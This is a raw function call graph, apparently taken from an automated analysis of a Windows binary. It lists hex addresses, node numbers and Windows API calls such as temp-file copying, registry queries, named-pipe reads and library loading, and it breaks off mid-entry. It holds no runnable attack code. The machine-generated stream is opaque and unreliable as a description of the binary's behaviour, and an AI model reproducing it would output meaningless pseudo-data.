6a547620 43 API calls 94538->94543 94715 6a547ad0 HeapAlloc RaiseException Concurrency::cancel_current_task 94540->94715 94542 6a54d65e 94544 6a54d6a4 94542->94544 94545 6a54dec6 94542->94545 94556 6a54d52e 94543->94556 94548 6a54da10 94544->94548 94549 6a54d6aa 94544->94549 94546 6a54df40 94545->94546 94547 6a54decd 94545->94547 94729 6a549420 #118 #118 94546->94729 94648 6a54d844 94547->94648 94728 6a549420 #118 #118 94547->94728 94721 6a5494c0 #171 #171 94548->94721 94553 6a54d6b5 94549->94553 94554 6a54d8c6 94549->94554 94550 6a54d559 94551 6a547620 43 API calls 94550->94551 94561 6a54d568 94551->94561 94553->94648 94716 6a5494c0 #171 #171 94553->94716 94719 6a5494c0 #171 #171 94554->94719 94556->94550 94560 6a547620 43 API calls 94556->94560 94559 6a56cbbc codecvt 5 API calls 94563 6a54e2aa 94559->94563 94560->94550 94567 6a54d599 94561->94567 94575 6a547620 43 API calls 94561->94575 94562 6a54da33 94579 6a54da5c 94562->94579 94580 6a54dcd8 94562->94580 94565 6a54d8e7 94565->94565 94573 6a546a10 43 API calls 94565->94573 94566 6a54defe 94566->94566 94574 6a546a10 43 API calls 94566->94574 94570 6a547e10 55 API calls 94567->94570 94568 6a54d6e1 94571 6a547130 57 API calls 94568->94571 94569 6a54e185 94732 6a549420 #118 #118 94569->94732 94577 6a54d59e 94570->94577 94578 6a54d6e9 94571->94578 94572 6a54df68 94572->94569 94730 6a549420 #118 #118 94572->94730 94581 6a54d90d 94573->94581 94574->94648 94575->94567 94577->94540 94585 6a54d5a8 94577->94585 94586 6a54d78c 94578->94586 94590 6a547130 57 API calls 94578->94590 94722 6a549420 #118 #118 94579->94722 94583 6a547130 57 API calls 94580->94583 94580->94648 94588 6a547130 57 API calls 94581->94588 94587 6a54dcf3 94583->94587 94584 6a54e235 94597 6a546a10 43 API calls 94584->94597 94598 6a547620 43 API calls 94585->94598 94589 6a56cbfb std::_Facet_Register 16 API calls 94586->94589 94591 6a54ddad 94587->94591 94600 6a547130 57 API calls 94587->94600 94594 6a54d912 94588->94594 94595 6a54d7d4 94589->94595 94592 6a54d6fb 94590->94592 94596 6a56cbfb std::_Facet_Register 16 API calls 94591->94596 94599 6a547e10 55 API calls 94592->94599 94608 6a547130 57 API calls 94594->94608 94594->94648 94609 6a546a10 43 API calls 94595->94609 94604 6a54ddf5 94596->94604 94597->94648 94605 6a54d5c6 94598->94605 94606 6a54d702 94599->94606 94603 6a54dd02 94600->94603 94601 6a54dfcf 94607 6a547130 57 API calls 94601->94607 94602 6a54da7e 94613 6a547130 57 API calls 94602->94613 94602->94648 94614 6a547e10 55 API calls 94603->94614 94610 6a546a10 43 API calls 94604->94610 94714 6a547210 62 API calls 94605->94714 94612 6a54e2b0 94606->94612 94634 6a547620 43 API calls 94606->94634 94615 6a54dfd7 94607->94615 94616 6a54d91d 94608->94616 94617 6a54d81f 94609->94617 94620 6a54de2b 94610->94620 94733 6a547ad0 HeapAlloc RaiseException Concurrency::cancel_current_task 94612->94733 94618 6a54daa1 94613->94618 94619 6a54dd0c 94614->94619 94626 6a547130 57 API calls 94615->94626 94711 6a54e089 94615->94711 94621 6a547e10 55 API calls 94616->94621 94623 6a545ef0 43 API calls 94617->94623 94625 6a54db57 94618->94625 94632 6a547130 57 API calls 94618->94632 94619->94612 94644 6a547620 43 API calls 94619->94644 94624 6a545ef0 43 API calls 94620->94624 94629 6a54d927 94621->94629 94630 6a54d835 94623->94630 94633 6a54de41 94624->94633 94724 6a559e70 43 API calls 94625->94724 94635 6a54dfe9 94626->94635 94627 6a56cbfb std::_Facet_Register 16 API calls 94636 6a54e0d4 94627->94636 94628 6a54e2ba 94629->94612 94647 6a547620 43 API calls 94629->94647 94718 6a54a920 49 API calls 94630->94718 94640 6a54dab0 94632->94640 94727 6a54a920 49 API calls 94633->94727 94654 6a54d72c 94634->94654 94641 6a547e10 55 API calls 94635->94641 94652 6a546a10 43 API calls 94636->94652 94639 6a54dbe4 94642 6a56cbfb std::_Facet_Register 16 API calls 94639->94642 94643 6a547e10 55 API calls 94640->94643 94646 6a54dff0 94641->94646 94649 6a54dbef 94642->94649 94650 6a54dab7 94643->94650 94667 6a54dd36 94644->94667 94645 6a54d74e 94651 6a547e10 55 API calls 94645->94651 94646->94612 94662 6a547620 43 API calls 94646->94662 94670 6a54d951 94647->94670 94648->94559 94653 6a545ef0 43 API calls 94649->94653 94650->94612 94674 6a547620 43 API calls 94650->94674 94655 6a54d753 94651->94655 94656 6a54e129 94652->94656 94658 6a54dc0e 94653->94658 94654->94645 94657 6a547620 43 API calls 94654->94657 94655->94612 94660 6a54d75d 94655->94660 94661 6a549a30 49 API calls 94656->94661 94657->94645 94666 6a545ef0 43 API calls 94658->94666 94659 6a54dd6c 94664 6a547e10 55 API calls 94659->94664 94675 6a547620 43 API calls 94660->94675 94663 6a54e134 94661->94663 94687 6a54e01a 94662->94687 94668 6a547090 41 API calls 94663->94668 94669 6a54dd74 94664->94669 94665 6a54d989 94671 6a547e10 55 API calls 94665->94671 94672 6a54dc24 94666->94672 94667->94659 94673 6a547620 43 API calls 94667->94673 94668->94569 94669->94612 94677 6a54dd7e 94669->94677 94670->94665 94678 6a547620 43 API calls 94670->94678 94679 6a54d991 94671->94679 94725 6a54a920 49 API calls 94672->94725 94673->94659 94689 6a54dae1 94674->94689 94681 6a54d77d 94675->94681 94676 6a54e03c 94682 6a547620 43 API calls 94676->94682 94691 6a547620 43 API calls 94677->94691 94678->94665 94679->94612 94683 6a54d99b 94679->94683 94717 6a547210 62 API calls 94681->94717 94688 6a54e04b 94682->94688 94699 6a547620 43 API calls 94683->94699 94684 6a54dc33 94696 6a547090 41 API calls 94684->94696 94685 6a54db19 94692 6a547e10 55 API calls 94685->94692 94687->94676 94690 6a547620 43 API calls 94687->94690 94693 6a547e10 55 API calls 94688->94693 94689->94685 94694 6a547620 43 API calls 94689->94694 94690->94676 94697 6a54dd9e 94691->94697 94695 6a54db1e 94692->94695 94698 6a54e050 94693->94698 94694->94685 94695->94612 94701 6a54db28 94695->94701 94696->94648 94726 6a547210 62 API calls 94697->94726 94698->94612 94702 6a54e05a 94698->94702 94703 6a54d9bb 94699->94703 94705 6a547620 43 API calls 94701->94705 94706 6a547620 43 API calls 94702->94706 94720 6a547210 62 API calls 94703->94720 94707 6a54db48 94705->94707 94708 6a54e07a 94706->94708 94723 6a547210 62 API calls 94707->94723 94731 6a547210 62 API calls 94708->94731 94711->94627 94712->94531 94713->94527 94714->94532 94715->94542 94716->94568 94717->94586 94718->94648 94719->94565 94720->94648 94721->94562 94722->94602 94723->94625 94724->94639 94725->94684 94726->94591 94727->94648 94728->94566 94729->94572 94730->94601 94731->94711 94732->94584 94733->94628 94734 276110 GetSystemDirectoryW 94735 27621b 94734->94735 94736 27615f 94734->94736 94737 34933a _ValidateLocalCookies 5 API calls 94735->94737 94736->94735 94738 1b9e20 51 API calls 94736->94738 94739 27626b 94737->94739 94740 27616f 94738->94740 94741 276273 94740->94741 94742 276179 94740->94742 94743 1b9ae0 2 API calls 94741->94743 94746 276195 94742->94746 94747 2761a3 94742->94747 94744 27627d 94743->94744 94745 349379 std::locale::_Init 2 API calls 94744->94745 94748 2763d2 94745->94748 94759 1b9120 50 API calls 94746->94759 94760 1b9990 42 API calls 3 library calls 94747->94760 94761 1cc1d0 41 API calls 3 library calls 94748->94761 94751 2761a1 94754 1cf3c0 83 API calls 94751->94754 94752 27641a 94755 2761e2 94754->94755 94756 1cf3c0 83 API calls 94755->94756 94757 276209 _wcschr 94756->94757 94757->94735 94758 27621f LoadLibraryExW 94757->94758 94758->94735 94759->94751 94760->94751 94761->94752 94762 6a56d46e 94763 6a56d4ac 94762->94763 94764 6a56d479 94762->94764 94774 6a56d5c8 94763->94774 94766 6a56d49e 94764->94766 94767 6a56d47e 94764->94767 94799 6a56d4c1 16 API calls 4 library calls 94766->94799 94768 6a56d494 94767->94768 94771 6a56d483 94767->94771 94798 6a56d0e0 23 API calls 94768->94798 94770 6a56d488 94771->94770 94797 6a56d0ff 21 API calls 94771->94797 94775 6a56d5d4 __FrameHandler3::FrameUnwindToState __DllMainCRTStartup@12 94774->94775 94776 6a56d605 94775->94776 94777 6a56d670 94775->94777 94790 6a56d5dd 94775->94790 94800 6a56d140 94776->94800 94809 6a56d995 IsProcessorFeaturePresent 94777->94809 94780 6a56d60a 94813 6a56dd89 15 API calls ___std_type_info_destroy_list 94780->94813 94782 6a56d677 __FrameHandler3::FrameUnwindToState 94783 6a56d6ad dllmain_raw 94782->94783 94793 6a56d6a8 __DllMainCRTStartup@12 94782->94793 94794 6a56d693 94782->94794 94785 6a56d6c7 dllmain_crt_dispatch 94783->94785 94783->94794 94784 6a56d60f __RTC_Initialize __DllMainCRTStartup@12 94814 6a56d2e1 77 API calls ___scrt_uninitialize_crt 94784->94814 94785->94793 94785->94794 94787 6a56d62e 94815 6a56d66a 12 API calls __DllMainCRTStartup@12 94787->94815 94789 6a56d719 94791 6a56d722 dllmain_crt_dispatch 94789->94791 94789->94794 94790->94770 94792 6a56d735 dllmain_raw 94791->94792 94791->94794 94792->94794 94793->94789 94795 6a56d5c8 __DllMainCRTStartup@12 83 API calls 94793->94795 94794->94770 94796 6a56d70e dllmain_raw 94795->94796 94796->94789 94797->94770 94798->94770 94799->94770 94801 6a56d145 ___scrt_release_startup_lock 94800->94801 94802 6a56d149 94801->94802 94806 6a56d155 __DllMainCRTStartup@12 94801->94806 94829 6a57b1f4 94802->94829 94804 6a56d153 94804->94780 94805 6a56d162 94805->94780 94806->94805 94816 6a57a841 94806->94816 94810 6a56d9ab __FrameHandler3::FrameUnwindToState codecvt 94809->94810 94811 6a56da56 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 94810->94811 94812 6a56daa1 __FrameHandler3::FrameUnwindToState 94811->94812 94812->94782 94813->94784 94814->94787 94815->94790 94817 6a57a880 94816->94817 94818 6a57a86e 94816->94818 94833 6a57a709 94817->94833 94841 6a57a909 GetModuleHandleW 94818->94841 94821 6a57a873 94821->94817 94842 6a57a96e GetModuleHandleExW GetProcAddress FreeLibrary 94821->94842 94823 6a57a8bd 94823->94780 94824 6a57a8ca 94843 6a57a8d8 13 API calls __FrameHandler3::FrameUnwindToState 94824->94843 94827 6a57a87f 94827->94817 94830 6a57b200 __EH_prolog3 94829->94830 94850 6a57af2d 94830->94850 94832 6a57b227 std::locale::_Init 94832->94804 94834 6a57a715 __FrameHandler3::FrameUnwindToState 94833->94834 94844 6a5788ea EnterCriticalSection 94834->94844 94836 6a57a71f 94845 6a57a756 94836->94845 94838 6a57a72c 94849 6a57a74a LeaveCriticalSection std::_Lockit::~_Lockit 94838->94849 94840 6a57a738 94840->94823 94840->94824 94841->94821 94842->94827 94844->94836 94846 6a57a762 __FrameHandler3::FrameUnwindToState 94845->94846 94847 6a57b1f4 __DllMainCRTStartup@12 14 API calls 94846->94847 94848 6a57a7c9 __FrameHandler3::FrameUnwindToState 94846->94848 94847->94848 94848->94838 94849->94840 94851 6a57af39 __FrameHandler3::FrameUnwindToState 94850->94851 94858 6a5788ea EnterCriticalSection 94851->94858 94853 6a57af47 94859 6a57b104 94853->94859 94857 6a57af65 94857->94832 94858->94853 94860 6a57b123 94859->94860 94862 6a57af54 94859->94862 94860->94862 94864 6a57d281 14 API calls __dosmaperr 94860->94864 94863 6a57af7c LeaveCriticalSection std::_Lockit::~_Lockit 94862->94863 94863->94857 94864->94862 94865 6a56d7ae 94866 6a56d7b7 94865->94866 94867 6a56d7bc 94865->94867 94882 6a56dd32 GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter ___get_entropy 94866->94882 94871 6a56d678 94867->94871 94872 6a56d684 __FrameHandler3::FrameUnwindToState 94871->94872 94873 6a56d6ad dllmain_raw 94872->94873 94877 6a56d6a8 __DllMainCRTStartup@12 94872->94877 94879 6a56d693 94872->94879 94874 6a56d6c7 dllmain_crt_dispatch 94873->94874 94873->94879 94874->94877 94874->94879 94875 6a56d719 94876 6a56d722 dllmain_crt_dispatch 94875->94876 94875->94879 94878 6a56d735 dllmain_raw 94876->94878 94876->94879 94877->94875 94880 6a56d5c8 __DllMainCRTStartup@12 88 API calls 94877->94880 94878->94879 94881 6a56d70e dllmain_raw 94880->94881 94881->94875 94882->94867 94883 2bf610 94890 2bf280 94883->94890 94885 2bf6ce GetLastError 94886 2bf67a 94885->94886 94887 2bf6e0 DeleteFileW 94886->94887 94889 2bf6e7 94886->94889 94887->94889 94888 2bf651 94888->94885 94888->94886 94903 2bae60 94890->94903 94892 2bf42a 94893 34933a _ValidateLocalCookies 5 API calls 94892->94893 94894 2bf458 94893->94894 94894->94888 94895 2bf2bd std::locale::_Setgloballocale 94895->94892 94896 2bf35a GetTempPathW 94895->94896 94910 34b890 94896->94910 94900 2bf3ae Wow64DisableWow64FsRedirection CopyFileW 94901 2bf400 94900->94901 94901->94892 94902 2bf418 Wow64RevertWow64FsRedirection 94901->94902 94902->94892 94914 2baf90 94903->94914 94906 349842 3 API calls 94907 2baeb0 std::locale::_Setgloballocale 94906->94907 94909 2baf37 94907->94909 94922 3497f8 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 94907->94922 94909->94895 94911 2bf382 GetTempFileNameW 94910->94911 94912 2bf4c0 94911->94912 94913 2bf4ca 94912->94913 94913->94900 94915 2bafc7 94914->94915 94921 2bae89 94914->94921 94916 349842 3 API calls 94915->94916 94917 2bafd1 94916->94917 94917->94921 94923 2bb030 94917->94923 94921->94906 94921->94909 94922->94909 94924 2bb086 RegOpenKeyExW 94923->94924 94925 2bb0ac RegQueryValueExW RegQueryValueExW 94924->94925 94926 2bb3c6 94924->94926 94927 2bb16b RegQueryValueExW 94925->94927 94932 2bb10f 94925->94932 94928 34933a _ValidateLocalCookies 5 API calls 94926->94928 94930 2bb1ae 94927->94930 94929 2baffa 94928->94929 94950 3497f8 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 94929->94950 94931 2bb24d RegQueryValueExW 94930->94931 94961 35470f 42 API calls 2 library calls 94930->94961 94933 2bb29f RegQueryValueExW 94931->94933 94935 2bb27a 94931->94935 94932->94927 94936 2bb2cc 94933->94936 94934 2bb386 94939 2bb3ba 94934->94939 94940 2bb390 GetCurrentProcess IsWow64Process 94934->94940 94935->94933 94936->94934 94938 349842 3 API calls 94936->94938 94942 2bb349 94938->94942 94951 2bb410 94939->94951 94940->94939 94943 2bb3ae 94940->94943 94941 2bb224 94945 2bb23c 94941->94945 94962 35470f 42 API calls 2 library calls 94941->94962 94942->94934 94946 2bb355 GetModuleHandleW GetProcAddress 94942->94946 94943->94939 94945->94931 94963 3497f8 EnterCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 94946->94963 94949 2bb383 94949->94934 94950->94921 94952 2bb468 RegOpenKeyExW 94951->94952 94953 2bb48e RegQueryValueExW 94952->94953 94954 2bb540 94952->94954 94957 2bb50f RegQueryValueExW 94953->94957 94960 2bb4c1 94953->94960 94955 2bb71e 94954->94955 94956 2bb70d RegCloseKey 94954->94956 94958 34933a _ValidateLocalCookies 5 API calls 94955->94958 94956->94955 94957->94954 94959 2bb736 94958->94959 94959->94926 94960->94957 94961->94941 94962->94945 94963->94949 94964 1b8720 94965 1b872a FindCloseChangeNotification 94964->94965 94966 1b8738 94964->94966 94965->94966 94967 345d68 94968 345d07 94967->94968 94968->94967 94970 34680c 94968->94970 94996 34656a 94970->94996 94972 34681c 94973 34689d 94972->94973 94974 346879 94972->94974 94977 346915 LoadLibraryExA 94973->94977 94978 346988 94973->94978 94979 346976 94973->94979 94990 346a44 94973->94990 95005 3467aa 6 API calls 2 library calls 94974->95005 94976 346884 RaiseException 94991 346a72 94976->94991 94977->94979 94980 346928 GetLastError 94977->94980 94981 3469e6 GetProcAddress 94978->94981 94978->94990 94979->94978 94982 346981 FreeLibrary 94979->94982 94983 346951 94980->94983 94984 34693b 94980->94984 94986 3469f6 GetLastError 94981->94986 94981->94990 94982->94978 95006 3467aa 6 API calls 2 library calls 94983->95006 94984->94979 94984->94983 94988 346a09 94986->94988 94987 34695c RaiseException 94987->94991 94988->94990 95007 3467aa 6 API calls 2 library calls 94988->95007 95008 3467aa 6 API calls 2 library calls 94990->95008 94991->94968 94993 346a2a RaiseException 94994 34656a ___delayLoadHelper2@8 6 API calls 94993->94994 94995 346a41 94994->94995 94995->94990 94997 346576 94996->94997 94998 34659c 94996->94998 95009 346613 GetModuleHandleW GetProcAddress GetProcAddress DloadReleaseSectionWriteAccess 94997->95009 94998->94972 95000 34657b 95002 346597 95000->95002 95010 34673c VirtualQuery GetSystemInfo VirtualProtect DloadProtectSection 95000->95010 95011 34659d GetModuleHandleW GetProcAddress GetProcAddress 95002->95011 95004 3467e5 95004->94972 95005->94976 95006->94987 95007->94993 95008->94991 95009->95000 95010->95002 95011->95004 95012 2cfbf0 95284 2f0550 95012->95284 95014 2cfc20 95015 1b9e20 51 API calls 95014->95015 95016 2cfc2c 95015->95016 95017 2cff43 95016->95017 95020 2cfc5f 95016->95020 95021 2cfc54 95016->95021 95018 1b9ae0 2 API calls 95017->95018 95019 2cff4d 95018->95019 95022 1b9e20 51 API calls 95019->95022 95041 2cffb6 95019->95041 95600 1b9990 42 API calls 3 library calls 95020->95600 95599 1b9120 50 API calls 95021->95599 95025 2cff84 95022->95025 95027 2cff8a 95025->95027 95028 2cfff6 95025->95028 95026 2cfc5d 95290 2bfe00 95026->95290 95035 1cf3c0 83 API calls 95027->95035 95031 1b9ae0 2 API calls 95028->95031 95030 2cfc93 95033 1b9e20 51 API calls 95030->95033 95032 2d0000 95031->95032 95474 2e3910 95032->95474 95036 2cfc9b 95033->95036 95038 2cffab 95035->95038 95036->95017 95297 1e86b0 95036->95297 95602 2b5200 95 API calls 95038->95602 95040 1bcaf0 61 API calls 95042 2d007b 95040->95042 95603 2db970 95042->95603 95044 2d0428 95046 1b9e20 51 API calls 95044->95046 95085 2d049f 95044->95085 95052 2d043d 95046->95052 95047 2cfccd 95313 2c42c0 95047->95313 95058 2d0535 95052->95058 95059 2d0447 95052->95059 95053 2d023a 95057 1b9e20 51 API calls 95053->95057 95056 34933a _ValidateLocalCookies 5 API calls 95062 2d050f 95056->95062 95060 2d0248 95057->95060 95063 1b9ae0 2 API calls 95058->95063 95071 1cf3c0 83 API calls 95059->95071 95065 2d0517 95060->95065 95066 2d0252 95060->95066 95067 2d053f 95063->95067 95069 1b9ae0 2 API calls 95065->95069 95077 1e86b0 52 API calls 95066->95077 95070 2d057a 95067->95070 95075 1b9e20 51 API calls 95067->95075 95072 2d0521 95069->95072 95074 2d0468 95071->95074 95078 1b9ae0 2 API calls 95072->95078 95624 2dbb80 75 API calls 95074->95624 95080 2d05c8 95075->95080 95083 2d026a 95077->95083 95082 2d052b 95078->95082 95081 2d07c6 95080->95081 95093 2d05fb 95080->95093 95094 2d05f0 95080->95094 95087 1b9ae0 2 API calls 95081->95087 95088 1b9ae0 2 API calls 95082->95088 95086 2d0277 95083->95086 95621 2a0ac0 42 API calls 4 library calls 95083->95621 95084 2d0094 95161 2d0199 95084->95161 95619 2db540 43 API calls 95084->95619 95479 2dafa0 95085->95479 95097 352fcd ___vcrt_freefls@4 13 API calls 95086->95097 95122 2d028b 95086->95122 95090 2d07d0 95087->95090 95088->95058 95509 1c7340 RaiseException 95090->95509 95626 1b9990 42 API calls 3 library calls 95093->95626 95625 1b9120 50 API calls 95094->95625 95095 2d0477 95095->95085 95098 1cf3c0 83 API calls 95095->95098 95097->95122 95098->95085 95101 2d07dc 95510 2d2610 272 API calls 3 library calls 95101->95510 95102 2cfcff 95105 2cfd9d 95102->95105 95106 2cfdf2 SetEvent 95102->95106 95103 2d05f9 95627 2b8d40 71 API calls 95103->95627 95111 2da670 44 API calls 95105->95111 95345 2f0bd0 95106->95345 95109 2d0811 95113 1b9e20 51 API calls 95109->95113 95116 2cfda5 95111->95116 95112 2cfe57 95117 2cfea8 95112->95117 95358 2da670 95112->95358 95193 2d0822 95113->95193 95114 1b9e20 51 API calls 95118 2d030e 95114->95118 95120 1b9e20 51 API calls 95116->95120 95457 2f0af0 95117->95457 95118->95072 95125 2d0318 95118->95125 95128 2cfdaa 95120->95128 95121 2d0396 95623 2db540 43 API calls 95121->95623 95122->95114 95174 2d033f 95122->95174 95124 2d0a6e 95133 1b9ae0 2 API calls 95124->95133 95141 1cf3c0 83 API calls 95125->95141 95128->95017 95132 2cfdb2 95128->95132 95151 2dc1b0 79 API calls 95132->95151 95137 2d0a78 95133->95137 95134 2a0ef0 13 API calls 95138 2d07a3 95134->95138 95156 1b9e20 51 API calls 95137->95156 95143 2a0ef0 13 API calls 95138->95143 95140 2d08da 95146 1b9e20 51 API calls 95140->95146 95148 2d0336 95141->95148 95152 2d07b2 95143->95152 95172 2d08e2 95146->95172 95147 2a0ef0 13 API calls 95194 2d0619 95147->95194 95622 2b5200 95 API calls 95148->95622 95155 2cfdd4 95151->95155 95162 2d6150 198 API calls 95155->95162 95157 2d0acd 95156->95157 95163 2d1069 95157->95163 95511 2d2610 272 API calls 3 library calls 95157->95511 95159 1b9e20 51 API calls 95159->95194 95160 1cff40 42 API calls 95160->95193 95161->95044 95186 2d03f5 95161->95186 95620 2d4520 29 API calls 95161->95620 95167 1b9ae0 2 API calls 95163->95167 95173 2d1073 95167->95173 95171 2d090c 95179 2d0923 95171->95179 95634 1b9790 42 API calls 95171->95634 95172->95124 95172->95171 95633 1b9790 42 API calls 95172->95633 95646 1c7340 RaiseException 95173->95646 95174->95044 95174->95121 95190 1b8d10 73 API calls 95179->95190 95181 2d0af1 95185 1b8d10 73 API calls 95181->95185 95183 2d107f 95189 2d0b03 95185->95189 95186->95056 95636 2d2400 272 API calls 4 library calls 95189->95636 95191 2d0944 95190->95191 95198 1b9e20 51 API calls 95191->95198 95193->95124 95193->95140 95193->95160 95196 1cf3c0 83 API calls 95193->95196 95194->95081 95194->95090 95194->95147 95194->95159 95208 2d0716 95194->95208 95230 2d0787 95194->95230 95628 1b9120 50 API calls 95194->95628 95629 1b9990 42 API calls 3 library calls 95194->95629 95630 2b8d40 71 API calls 95194->95630 95631 2b89b0 43 API calls std::ios_base::_Ios_base_dtor 95194->95631 95196->95193 95200 2d096a 95198->95200 95200->95124 95203 2d0972 95200->95203 95209 1b9e20 51 API calls 95208->95209 95211 2d071e 95209->95211 95211->95081 95214 2d0726 95211->95214 95219 1e86b0 52 API calls 95214->95219 95221 2d0740 95219->95221 95226 2d074d 95221->95226 95632 1e8790 44 API calls 95221->95632 95226->95090 95226->95230 95230->95134 95285 1b9e20 51 API calls 95284->95285 95286 2f058c 95285->95286 95287 1b9ae0 2 API calls 95286->95287 95289 2f0592 95286->95289 95288 2f05e8 95287->95288 95289->95014 95291 2bfe0e 95290->95291 95292 2bfe69 95291->95292 95293 2bfe28 WideCharToMultiByte 95291->95293 95292->95030 95294 2bfe65 95293->95294 95295 2bfe44 95293->95295 95294->95030 95296 2bfe4a WideCharToMultiByte 95295->95296 95296->95294 95298 1e8762 95297->95298 95299 1e86c4 95297->95299 95298->95047 95601 2a0ac0 42 API calls 4 library calls 95298->95601 95299->95298 95647 1b8f10 7 API calls 95299->95647 95301 1e86d9 95301->95298 95302 1e86e3 FindResourceW 95301->95302 95302->95298 95303 1e86f7 95302->95303 95648 1b8fe0 LoadResource LockResource SizeofResource 95303->95648 95305 1e8701 95305->95298 95306 1e870a WideCharToMultiByte 95305->95306 95307 1e872a 95306->95307 95308 1e8776 95306->95308 95309 1e8745 WideCharToMultiByte 95307->95309 95649 1e8970 42 API calls 95307->95649 95310 1b9ae0 2 API calls 95308->95310 95309->95298 95309->95308 95312 1e8780 95310->95312 95314 1b9e20 51 API calls 95313->95314 95315 2c42ee 95314->95315 95316 2c42f4 95315->95316 95317 2c4343 95315->95317 95320 2c4320 95316->95320 95321 2c4313 95316->95321 95318 1b9ae0 2 API calls 95317->95318 95319 2c434d 95318->95319 95651 2b5460 44 API calls 95320->95651 95650 1b9120 50 API calls 95321->95650 95324 2c431e 95325 2ab9f0 95324->95325 95326 2aba35 95325->95326 95327 1b9e20 51 API calls 95326->95327 95329 2aba52 95326->95329 95328 2aba45 95327->95328 95328->95329 95330 2aba95 95328->95330 95652 29e060 95329->95652 95332 1b9ae0 2 API calls 95330->95332 95334 2aba9f 95332->95334 95333 2aba7f 95335 2f05f0 95333->95335 95336 2f061d 95335->95336 95337 2f0633 95335->95337 95336->95102 95338 1cfdb0 42 API calls 95337->95338 95339 2f0644 95338->95339 95666 2f0f60 95339->95666 95346 2f0c16 95345->95346 95347 2f0c00 95345->95347 95348 1b9e20 51 API calls 95346->95348 95347->95112 95349 2f0c1b 95348->95349 95350 2f0c25 95349->95350 95351 2f0d02 95349->95351 95684 2f0d10 95350->95684 95352 1b9ae0 2 API calls 95351->95352 95353 2f0d0c 95352->95353 95359 2da6a6 95358->95359 95360 2da680 95358->95360 95731 1c7340 RaiseException 95359->95731 95360->95359 95362 2da692 DeleteFileW 95360->95362 95362->95359 95362->95360 95363 2da77c 95366 2da7b8 95368 2da6c1 std::ios_base::_Ios_base_dtor 95368->95363 95368->95366 95732 2f41e0 95368->95732 95458 1b9e20 51 API calls 95457->95458 95459 2f0b24 95458->95459 95460 2f0b2e 95459->95460 95461 2f0bbc 95459->95461 95475 2e391d 95474->95475 95478 2d0058 95474->95478 95475->95478 95987 1c7340 RaiseException 95475->95987 95477 2e3952 95478->95040 95478->95161 95480 2db970 43 API calls 95479->95480 95481 2dafd7 95480->95481 95482 2dafdd 95481->95482 95483 2daff1 95481->95483 95482->95186 95988 2db5a0 99 API calls 95483->95988 95485 2daffc 95989 2db7c0 11 API calls _ValidateLocalCookies 95485->95989 95487 2db017 95488 1b9e20 51 API calls 95487->95488 95508 2db08b 95487->95508 95492 2db031 95488->95492 95489 2db0e3 95498 2db0f8 95489->95498 95991 2db1a0 54 API calls 95489->95991 95490 2db192 95993 1c7340 RaiseException 95490->95993 95495 2db188 95492->95495 95496 2db03b 95492->95496 95494 2db19e 95497 1b9ae0 2 API calls 95495->95497 95500 1cf3c0 83 API calls 95496->95500 95497->95490 95501 2db128 95498->95501 95992 2db1a0 54 API calls 95498->95992 95502 2db059 95500->95502 95504 2db13e 95501->95504 95505 352fcd ___vcrt_freefls@4 13 API calls 95501->95505 95990 2dbb80 75 API calls 95502->95990 95504->95186 95505->95504 95506 2db063 95507 1cf3c0 83 API calls 95506->95507 95506->95508 95507->95508 95508->95489 95508->95490 95509->95101 95510->95109 95511->95181 95599->95026 95600->95026 95601->95047 95602->95041 95604 2db9ae EnumResourceLanguagesW 95603->95604 95613 2dbb08 95603->95613 95612 2db9ed 95604->95612 95605 2dba4b 96121 35bb01 14 API calls __dosmaperr 95605->96121 95606 2dba3e 95606->95605 95609 352fcd ___vcrt_freefls@4 13 API calls 95606->95609 95607 2dbb38 96123 1c7340 RaiseException 95607->96123 95609->95605 95611 2dbae6 95611->95613 95615 352fcd ___vcrt_freefls@4 13 API calls 95611->95615 95612->95606 95612->95607 95616 2dba80 95612->95616 95613->95084 95614 2dba6e 95614->95607 95614->95611 95615->95613 95616->95614 96122 1cfe20 40 API calls 3 library calls 95616->96122 95618 2dbb44 95618->95084 95620->95053 95621->95086 95622->95174 95624->95095 95625->95103 95626->95103 95627->95194 95628->95194 95629->95194 95630->95194 95631->95194 95632->95226 95633->95171 95634->95179 95646->95183 95647->95301 95648->95305 95649->95309 95650->95324 95651->95324 95654 29e076 95652->95654 95660 29e0b5 95652->95660 95653 1b9ae0 2 API calls 95662 29e0da 95653->95662 95655 29e091 95654->95655 95663 1b9870 42 API calls 95654->95663 95664 1b98e0 40 API calls 4 library calls 95655->95664 95658 29e0a2 95665 1b98e0 40 API calls 4 library calls 95658->95665 95660->95653 95661 29e0c0 95660->95661 95661->95333 95662->95333 95663->95655 95664->95658 95665->95660 95667 1b9e20 51 API calls 95666->95667 95668 2f0f9a 95667->95668 95669 2f100a 95668->95669 95670 2f0fa0 95668->95670 95671 1b9ae0 2 API calls 95669->95671 95673 2f0fcd 95670->95673 95674 2f0fc2 95670->95674 95672 2f1014 95671->95672 95675 2f0880 88 API calls 95672->95675 95683 1b9990 42 API calls 3 library calls 95673->95683 95682 1b9120 50 API calls 95674->95682 95681 2f1058 95675->95681 95678 2f0fcb 95679 1cf3c0 83 API calls 95678->95679 95682->95678 95683->95678 95685 2f0d49 ConnectNamedPipe 95684->95685 95686 2f0d94 ReadFile 95684->95686 95685->95686 95689 2f0d56 GetLastError 95685->95689 95687 2f0dbc 95686->95687 95688 2f0e29 95686->95688 95687->95688 95689->95686 95731->95368 95987->95477 95988->95485 95989->95487 95990->95506 95993->95494 96122->95616 96123->95618 96124 2d9090 96125 1b9e20 51 API calls 96124->96125 96129 2d90e5 96125->96129 96126 2d9b04 96127 1b9ae0 2 API calls 96126->96127 96128 2d9b0e 96127->96128 96129->96126 96130 1b9e20 51 API calls 96129->96130 96131 2d9124 96130->96131 96131->96126 96132 1b9e20 51 API calls 96131->96132 96133 2d9142 96132->96133 96133->96126 96134 2d9241 96133->96134 96221 2b5760 69 API calls _wcsrchr 96133->96221 96135 1b9e20 51 API calls 96134->96135 96184 2d927e std::locale::_Setgloballocale 96135->96184 96137 2d9173 96138 1cfdb0 42 API calls 96137->96138 96139 2d9180 96138->96139 96141 1cfdb0 42 API calls 96139->96141 96140 349379 std::locale::_Init 2 API calls 96140->96184 96143 2d91d8 96141->96143 96222 2d9c40 69 API calls 96143->96222 96144 2d985e 96146 2d9864 96144->96146 96147 2d98b0 CreateThread 96144->96147 96148 2d9883 CreateEventW 96144->96148 96149 2d9965 